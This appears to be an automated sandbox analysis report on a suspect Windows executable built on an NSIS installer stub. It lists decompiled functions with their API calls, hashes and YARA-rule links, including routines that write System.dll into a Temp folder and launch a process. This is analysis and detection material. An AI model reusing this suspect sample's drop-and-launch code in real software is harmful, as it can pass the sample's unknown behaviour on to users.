                                                                                                                    0x0040469a
                                                                                                                    0x0040469d
                                                                                                                    0x0040469d
                                                                                                                    0x004046a1
                                                                                                                    0x004046b1
                                                                                                                    0x004046b3
                                                                                                                    0x004046b6
                                                                                                                    0x0040465f
                                                                                                                    0x0040465f
                                                                                                                    0x00404666
                                                                                                                    0x00404666
                                                                                                                    0x004046be
                                                                                                                    0x004046c9
                                                                                                                    0x004046df
                                                                                                                    0x004046ef
                                                                                                                    0x0040470b

                                                                                                                    APIs
                                                                                                                    • lstrlenA.KERNEL32(00420538,00420538,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404564,000000DF,00000000,00000400,?), ref: 004046E7
                                                                                                                    • wsprintfA.USER32 ref: 004046EF
                                                                                                                    • SetDlgItemTextA.USER32 ref: 00404702
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.233167417.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.233162094.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233190449.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233194465.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233219819.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233229304.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233240015.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: ItemTextlstrlenwsprintf
                                                                                                                    • String ID: %u.%u%s%s
                                                                                                                    • API String ID: 3540041739-3551169577
                                                                                                                    • Opcode ID: 9ec326ac30901ad515aaf80f2404a58f9bab4133aba90e091d0e9c932beca6f7
                                                                                                                    • Instruction ID: 33c490f36d39f428f4b6feb88c055206d8f5fbd89635bf607d329e374d543c8d
                                                                                                                    • Opcode Fuzzy Hash: 9ec326ac30901ad515aaf80f2404a58f9bab4133aba90e091d0e9c932beca6f7
                                                                                                                    • Instruction Fuzzy Hash: 5A11D873A0512437EB0065699C41EAF329CDB82335F150637FE26F31D1E9B9DD1145E8
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00401BCA, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 51%
                                                                                                                    			E00401BCA() {
				signed int _t28;
				CHAR* _t31;
				long _t32;
				int _t37;
				signed int _t38;
				int _t42;
				int _t48;
				struct HWND__* _t52;
				void* _t55;

				 *(_t55 - 8) = E00402A0C(3);
				 *(_t55 + 8) = E00402A0C(4);
				if(( *(_t55 - 0x14) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 8)) = E00402A29(0x33);
				}
				__eflags =  *(_t55 - 0x14) & 0x00000002;
				if(( *(_t55 - 0x14) & 0x00000002) != 0) {
					 *(_t55 + 8) = E00402A29(0x44);
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x2c)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t50 = E00402A29();
					_t28 = E00402A29();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t31 =  ~( *_t27) & _t50;
					__eflags = _t31;
					_t32 = FindWindowExA( *(_t55 - 8),  *(_t55 + 8), _t31,  ~( *_t28) & _t28);
					goto L10;
				} else {
					_t52 = E00402A0C();
					_t37 = E00402A0C();
					_t48 =  *(_t55 - 0x14) >> 2;
					if(__eflags == 0) {
						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 8),  *(_t55 + 8));
						L10:
						 *(_t55 - 0xc) = _t32;
					} else {
						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 8),  *(_t55 + 8), _t42, _t48, _t55 - 0xc);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - _t42;
				if( *((intOrPtr*)(_t55 - 0x28)) >= _t42) {
					_push( *(_t55 - 0xc));
					E00405AF6();
				}
				 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t55 - 4));
				return 0;
			}












                                                                                                                    0x00401bd3
                                                                                                                    0x00401bdf
                                                                                                                    0x00401be2
                                                                                                                    0x00401beb
                                                                                                                    0x00401beb
                                                                                                                    0x00401bee
                                                                                                                    0x00401bf2
                                                                                                                    0x00401bfb
                                                                                                                    0x00401bfb
                                                                                                                    0x00401bfe
                                                                                                                    0x00401c02
                                                                                                                    0x00401c04
                                                                                                                    0x00401c51
                                                                                                                    0x00401c53
                                                                                                                    0x00401c5c
                                                                                                                    0x00401c64
                                                                                                                    0x00401c67
                                                                                                                    0x00401c67
                                                                                                                    0x00401c70
                                                                                                                    0x00000000
                                                                                                                    0x00401c06
                                                                                                                    0x00401c0d
                                                                                                                    0x00401c0f
                                                                                                                    0x00401c17
                                                                                                                    0x00401c1a
                                                                                                                    0x00401c42
                                                                                                                    0x00401c76
                                                                                                                    0x00401c76
                                                                                                                    0x00401c1c
                                                                                                                    0x00401c2a
                                                                                                                    0x00401c32
                                                                                                                    0x00401c35
                                                                                                                    0x00401c35
                                                                                                                    0x00401c1a
                                                                                                                    0x00401c79
                                                                                                                    0x00401c7c
                                                                                                                    0x00401c82
                                                                                                                    0x00402866
                                                                                                                    0x00402866
                                                                                                                    0x004028c1
                                                                                                                    0x004028cd

                                                                                                                    APIs
                                                                                                                    • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                                                                                    • SendMessageA.USER32 ref: 00401C42
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.233167417.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.233162094.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233190449.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233194465.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233219819.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233229304.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233240015.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$Timeout
                                                                                                                    • String ID: !
                                                                                                                    • API String ID: 1777923405-2657877971
                                                                                                                    • Opcode ID: 5e155985e8b695c365f3075347fc5cad64183b83899d6bbba3f89d2116927a25
                                                                                                                    • Instruction ID: 8eb34b9659dedbc099cc11ce9bc18cab6bc834bdcc036981f8d30f042af137bc
                                                                                                                    • Opcode Fuzzy Hash: 5e155985e8b695c365f3075347fc5cad64183b83899d6bbba3f89d2116927a25
                                                                                                                    • Instruction Fuzzy Hash: C621A171A44149BEEF02AFF4C94AAEE7B75EF44704F10407EF501BA1D1DAB88A40DB29
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0040568B, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E0040568B(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x409010);
				}
				return _t7;
			}




                                                                                                                    0x0040568c
                                                                                                                    0x004056a3
                                                                                                                    0x004056ab
                                                                                                                    0x004056ab
                                                                                                                    0x004056b3

                                                                                                                    APIs
                                                                                                                    • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004030E8,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 00405691
                                                                                                                    • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004030E8,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 0040569A
                                                                                                                    • lstrcatA.KERNEL32(?,00409010), ref: 004056AB
                                                                                                                    Strings
                                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 0040568B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.233167417.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.233162094.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233190449.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233194465.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233219819.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233229304.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233240015.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: CharPrevlstrcatlstrlen
                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                    • API String ID: 2659869361-823278215
                                                                                                                    • Opcode ID: e3dc442850fe5195f819a2e9cc08a879faccac673fa9b112cfeaaf00c09b2b73
                                                                                                                    • Instruction ID: e5ee9c2d52b027f92723a61f0ff242ac356e57f7af316d882355b101730f0027
                                                                                                                    • Opcode Fuzzy Hash: e3dc442850fe5195f819a2e9cc08a879faccac673fa9b112cfeaaf00c09b2b73
                                                                                                                    • Instruction Fuzzy Hash: 05D0A972606A302AE60227158C09F8B3A2CCF02321B040462F540B6292C2BC7D818BEE
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00401D38, Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 67%
                                                                                                                    			E00401D38() {
				void* __esi;
				int _t6;
				signed char _t11;
				struct HFONT__* _t14;
				void* _t18;
				void* _t24;
				void* _t26;
				void* _t28;

				_t6 = GetDeviceCaps(GetDC( *(_t28 - 8)), 0x5a);
				0x40b014->lfHeight =  ~(MulDiv(E00402A0C(2), _t6, 0x48));
				 *0x40b024 = E00402A0C(3);
				_t11 =  *((intOrPtr*)(_t28 - 0x18));
				 *0x40b02b = 1;
				 *0x40b028 = _t11 & 0x00000001;
				 *0x40b029 = _t11 & 0x00000002;
				 *0x40b02a = _t11 & 0x00000004;
				E00405BBA(_t18, _t24, _t26, 0x40b030,  *((intOrPtr*)(_t28 - 0x24)));
				_t14 = CreateFontIndirectA(0x40b014);
				_push(_t14);
				_push(_t26);
				E00405AF6();
				 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t28 - 4));
				return 0;
			}











                                                                                                                    0x00401d46
                                                                                                                    0x00401d5f
                                                                                                                    0x00401d69
                                                                                                                    0x00401d6e
                                                                                                                    0x00401d79
                                                                                                                    0x00401d80
                                                                                                                    0x00401d92
                                                                                                                    0x00401d98
                                                                                                                    0x00401d9d
                                                                                                                    0x00401da7
                                                                                                                    0x004024eb
                                                                                                                    0x00401561
                                                                                                                    0x00402866
                                                                                                                    0x004028c1
                                                                                                                    0x004028cd

                                                                                                                    APIs
                                                                                                                    • GetDC.USER32(?), ref: 00401D3F
                                                                                                                    • GetDeviceCaps.GDI32(00000000), ref: 00401D46
                                                                                                                    • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D55
                                                                                                                    • CreateFontIndirectA.GDI32(0040B014), ref: 00401DA7
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.233167417.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.233162094.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233190449.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233194465.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233219819.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233229304.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233240015.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: CapsCreateDeviceFontIndirect
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3272661963-0
                                                                                                                    • Opcode ID: 91a73ead397859bf4c0615e863a468d78fcadc575e8fb258f1077711b7347c7d
                                                                                                                    • Instruction ID: 0c2e595a2d755a053b7cc3d6c09569b1e3f8f946256c05fe5e222a6b1ed621d0
                                                                                                                    • Opcode Fuzzy Hash: 91a73ead397859bf4c0615e863a468d78fcadc575e8fb258f1077711b7347c7d
                                                                                                                    • Instruction Fuzzy Hash: B0F0C870E48280AFE70157705F0ABAB3F64D715305F100876F251BA2E3C7B910088BAE
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00402BF1, Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E00402BF1(intOrPtr _a4) {
				long _t2;
				struct HWND__* _t3;
				struct HWND__* _t6;

				if(_a4 == 0) {
					__eflags =  *0x4170e0; // 0x0
					if(__eflags == 0) {
						_t2 = GetTickCount();
						__eflags = _t2 -  *0x423f4c;
						if(_t2 >  *0x423f4c) {
							_t3 = CreateDialogParamA( *0x423f40, 0x6f, 0, E00402B6E, 0);
							 *0x4170e0 = _t3;
							return ShowWindow(_t3, 5);
						}
						return _t2;
					} else {
						return E00405F64(0);
					}
				} else {
					_t6 =  *0x4170e0; // 0x0
					if(_t6 != 0) {
						_t6 = DestroyWindow(_t6);
					}
					 *0x4170e0 = 0;
					return _t6;
				}
			}






                                                                                                                    0x00402bf8
                                                                                                                    0x00402c12
                                                                                                                    0x00402c18
                                                                                                                    0x00402c22
                                                                                                                    0x00402c28
                                                                                                                    0x00402c2e
                                                                                                                    0x00402c3f
                                                                                                                    0x00402c48
                                                                                                                    0x00000000
                                                                                                                    0x00402c4d
                                                                                                                    0x00402c54
                                                                                                                    0x00402c1a
                                                                                                                    0x00402c21
                                                                                                                    0x00402c21
                                                                                                                    0x00402bfa
                                                                                                                    0x00402bfa
                                                                                                                    0x00402c01
                                                                                                                    0x00402c04
                                                                                                                    0x00402c04
                                                                                                                    0x00402c0a
                                                                                                                    0x00402c11
                                                                                                                    0x00402c11

                                                                                                                    APIs
                                                                                                                    • DestroyWindow.USER32(00000000,00000000,00402DD1,00000001), ref: 00402C04
                                                                                                                    • GetTickCount.KERNEL32 ref: 00402C22
                                                                                                                    • CreateDialogParamA.USER32(0000006F,00000000,00402B6E,00000000), ref: 00402C3F
                                                                                                                    • ShowWindow.USER32(00000000,00000005), ref: 00402C4D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.233167417.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.233162094.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233190449.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233194465.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233219819.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233229304.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233240015.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2102729457-0
                                                                                                                    • Opcode ID: 368aa0899d27fe077c31989b75da56c4405109c76bea3f602025cb1c6477c4a6
                                                                                                                    • Instruction ID: 902fecb1894dce430947e24fe85b059bfb73d5b7bbd16117cdf5d745fa908bfb
                                                                                                                    • Opcode Fuzzy Hash: 368aa0899d27fe077c31989b75da56c4405109c76bea3f602025cb1c6477c4a6
                                                                                                                    • Instruction Fuzzy Hash: 37F03030A09321ABC611EF60BE4CA9E7B74F748B417118576F201B11A4CB7858818B9D
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 004038B4, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E004038B4(void* __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t6;
				intOrPtr _t11;
				signed int _t13;
				signed int _t16;
				signed short* _t18;
				signed int _t20;
				signed short* _t23;
				intOrPtr _t25;
				signed int _t26;
				intOrPtr* _t27;

				_t24 = "1033";
				_t13 = 0xffff;
				_t6 = E00405B0F(__ecx, "1033");
				while(1) {
					_t26 =  *0x423f84;
					if(_t26 == 0) {
						goto L7;
					}
					_t16 =  *( *0x423f50 + 0x64);
					_t20 =  ~_t16;
					_t18 = _t16 * _t26 +  *0x423f80;
					while(1) {
						_t18 = _t18 + _t20;
						_t26 = _t26 - 1;
						if((( *_t18 ^ _t6) & _t13) == 0) {
							break;
						}
						if(_t26 != 0) {
							continue;
						}
						goto L7;
					}
					 *0x423720 = _t18[1];
					 *0x423fe8 = _t18[3];
					_t23 =  &(_t18[5]);
					if(_t23 != 0) {
						 *0x42371c = _t23;
						E00405AF6(_t24,  *_t18 & 0x0000ffff);
						SetWindowTextA( *0x420510, E00405BBA(_t13, _t24, _t26, 0x423740, 0xfffffffe));
						_t11 =  *0x423f6c;
						_t27 =  *0x423f68;
						if(_t11 == 0) {
							L15:
							return _t11;
						}
						_t25 = _t11;
						do {
							_t11 =  *_t27;
							if(_t11 != 0) {
								_t11 = E00405BBA(_t13, _t25, _t27, _t27 + 0x18, _t11);
							}
							_t27 = _t27 + 0x418;
							_t25 = _t25 - 1;
						} while (_t25 != 0);
						goto L15;
					}
					L7:
					if(_t13 != 0xffff) {
						_t13 = 0;
					} else {
						_t13 = 0x3ff;
					}
				}
			}
















                                                                                                                    0x004038b8
                                                                                                                    0x004038bd
                                                                                                                    0x004038c3
                                                                                                                    0x004038c8
                                                                                                                    0x004038c8
                                                                                                                    0x004038d0
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004038d8
                                                                                                                    0x004038e0
                                                                                                                    0x004038e2
                                                                                                                    0x004038e8
                                                                                                                    0x004038e8
                                                                                                                    0x004038ea
                                                                                                                    0x004038f6
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004038fa
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004038fc
                                                                                                                    0x00403901
                                                                                                                    0x0040390a
                                                                                                                    0x00403910
                                                                                                                    0x00403915
                                                                                                                    0x00403929
                                                                                                                    0x00403934
                                                                                                                    0x0040394c
                                                                                                                    0x00403952
                                                                                                                    0x00403957
                                                                                                                    0x0040395f
                                                                                                                    0x00403980
                                                                                                                    0x00403980
                                                                                                                    0x00403980
                                                                                                                    0x00403961
                                                                                                                    0x00403963
                                                                                                                    0x00403963
                                                                                                                    0x00403967
                                                                                                                    0x0040396e
                                                                                                                    0x0040396e
                                                                                                                    0x00403973
                                                                                                                    0x00403979
                                                                                                                    0x00403979
                                                                                                                    0x00000000
                                                                                                                    0x00403963
                                                                                                                    0x00403917
                                                                                                                    0x0040391c
                                                                                                                    0x00403925
                                                                                                                    0x0040391e
                                                                                                                    0x0040391e
                                                                                                                    0x0040391e
                                                                                                                    0x0040391c

                                                                                                                    APIs
                                                                                                                    • SetWindowTextA.USER32(00000000,00423740), ref: 0040394C
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.233167417.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.233162094.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233190449.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233194465.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233219819.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233229304.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233240015.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: TextWindow
                                                                                                                    • String ID: "C:\Users\user\Desktop\WXs8v9QuE7.exe" $1033
                                                                                                                    • API String ID: 530164218-3195026801
                                                                                                                    • Opcode ID: efc42492ee7b8a51a3ec7fa34d8682ca64c79934ee229eb602048578ff3af0eb
                                                                                                                    • Instruction ID: 9405f6c8d043b7fcf606726b90d8bdb5e10644d2b1bbff0bcd5da451eaf68503
                                                                                                                    • Opcode Fuzzy Hash: efc42492ee7b8a51a3ec7fa34d8682ca64c79934ee229eb602048578ff3af0eb
                                                                                                                    • Instruction Fuzzy Hash: D211CFB1F006119BC7349F15E88093777BDEB89716369817FE801A73E0D67DAE029A98
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00404DD4, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E00404DD4(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				long _t22;

				if(_a8 != 0x102) {
					if(_a8 != 0x200) {
						_t22 = _a16;
						L7:
						if(_a8 == 0x419 &&  *0x420520 != _t22) {
							 *0x420520 = _t22;
							E00405B98(0x420538, 0x425000);
							E00405AF6(0x425000, _t22);
							E0040140B(6);
							E00405B98(0x425000, 0x420538);
						}
						L11:
						return CallWindowProcA( *0x420528, _a4, _a8, _a12, _t22);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t22 = _a16;
						goto L11;
					}
					_t22 = E00404753(_a4, 1);
					_a8 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00403EA0(0x413);
				return 0;
			}




                                                                                                                    0x00404de0
                                                                                                                    0x00404e05
                                                                                                                    0x00404e25
                                                                                                                    0x00404e28
                                                                                                                    0x00404e2b
                                                                                                                    0x00404e42
                                                                                                                    0x00404e48
                                                                                                                    0x00404e4f
                                                                                                                    0x00404e56
                                                                                                                    0x00404e5d
                                                                                                                    0x00404e62
                                                                                                                    0x00404e68
                                                                                                                    0x00000000
                                                                                                                    0x00404e78
                                                                                                                    0x00404e12
                                                                                                                    0x00404e65
                                                                                                                    0x00404e65
                                                                                                                    0x00000000
                                                                                                                    0x00404e65
                                                                                                                    0x00404e1e
                                                                                                                    0x00404e20
                                                                                                                    0x00000000
                                                                                                                    0x00404e20
                                                                                                                    0x00404de6
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00404ded
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    • IsWindowVisible.USER32(?), ref: 00404E0A
                                                                                                                    • CallWindowProcA.USER32 ref: 00404E78
                                                                                                                      • Part of subcall function 00403EA0: SendMessageA.USER32 ref: 00403EB2
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.233167417.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.233162094.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233190449.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233194465.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233219819.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233229304.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233240015.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$CallMessageProcSendVisible
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3748168415-3916222277
                                                                                                                    • Opcode ID: d178a5782ca8d626d003a390d0a002469a0ac64d132e68a5e4d1ef6bfeb92247
                                                                                                                    • Instruction ID: 907b3508a45335f305929b628defbf7950d0c65962cf50d158fef9db48df65ea
                                                                                                                    • Opcode Fuzzy Hash: d178a5782ca8d626d003a390d0a002469a0ac64d132e68a5e4d1ef6bfeb92247
                                                                                                                    • Instruction Fuzzy Hash: 3B11BF71600208BFDF21AF61DC4099B3769BF843A5F40803BF604791A2C7BC4991DFA9
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 004024F1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34filestringCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E004024F1(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
				int _t5;
				long _t7;
				struct _OVERLAPPED* _t11;
				intOrPtr* _t15;
				void* _t17;
				int _t21;

				_t15 = __esi;
				_t11 = __ebx;
				if( *((intOrPtr*)(_t17 - 0x20)) == __ebx) {
					_t7 = lstrlenA(E00402A29(0x11));
				} else {
					E00402A0C(1);
					 *0x40a010 = __al;
				}
				if( *_t15 == _t11) {
					L8:
					 *((intOrPtr*)(_t17 - 4)) = 1;
				} else {
					_t5 = WriteFile(E00405B0F(_t17 + 8, _t15), "C:\Users\alfons\AppData\Local\Temp\nsa7685.tmp\System.dll", _t7, _t17 + 8, _t11);
					_t21 = _t5;
					if(_t21 == 0) {
						goto L8;
					}
				}
				 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}









                                                                                                                    0x004024f1
                                                                                                                    0x004024f1
                                                                                                                    0x004024f4
                                                                                                                    0x0040250f
                                                                                                                    0x004024f6
                                                                                                                    0x004024f8
                                                                                                                    0x004024fd
                                                                                                                    0x00402504
                                                                                                                    0x00402516
                                                                                                                    0x0040268f
                                                                                                                    0x0040268f
                                                                                                                    0x0040251c
                                                                                                                    0x0040252e
                                                                                                                    0x004015a6
                                                                                                                    0x004015a8
                                                                                                                    0x00000000
                                                                                                                    0x004015ae
                                                                                                                    0x004015a8
                                                                                                                    0x004028c1
                                                                                                                    0x004028cd

                                                                                                                    APIs
                                                                                                                    • lstrlenA.KERNEL32(00000000,00000011), ref: 0040250F
                                                                                                                    • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsa7685.tmp\System.dll,00000000,?,?,00000000,00000011), ref: 0040252E
                                                                                                                    Strings
                                                                                                                    • C:\Users\user\AppData\Local\Temp\nsa7685.tmp\System.dll, xrefs: 004024FD, 00402522
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.233167417.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.233162094.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233190449.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233194465.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233219819.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233229304.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233240015.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: FileWritelstrlen
                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nsa7685.tmp\System.dll
                                                                                                                    • API String ID: 427699356-2537629282
                                                                                                                    • Opcode ID: faed2be3babe74328216e072a36557fa4b6c56c80749c58986111d6fd9eb6ae7
                                                                                                                    • Instruction ID: 6775f3f9e4e00d505f4e1783fd87b496617f08e9b0a5c20f68d0788d80e55df2
                                                                                                                    • Opcode Fuzzy Hash: faed2be3babe74328216e072a36557fa4b6c56c80749c58986111d6fd9eb6ae7
                                                                                                                    • Instruction Fuzzy Hash: F9F08971A44244BFD710EFA49E49AEF7668DB40348F10043BF141F51C2D6FC5641966E
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 004053F8, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E004053F8(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x422540->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x422540,  &_v20);
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                                                                                                                    0x00405401
                                                                                                                    0x0040541d
                                                                                                                    0x00405425
                                                                                                                    0x0040542a
                                                                                                                    0x00000000
                                                                                                                    0x00405430
                                                                                                                    0x00405434

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    • Error launching installer, xrefs: 0040540B
                                                                                                                    Memory Dump Source
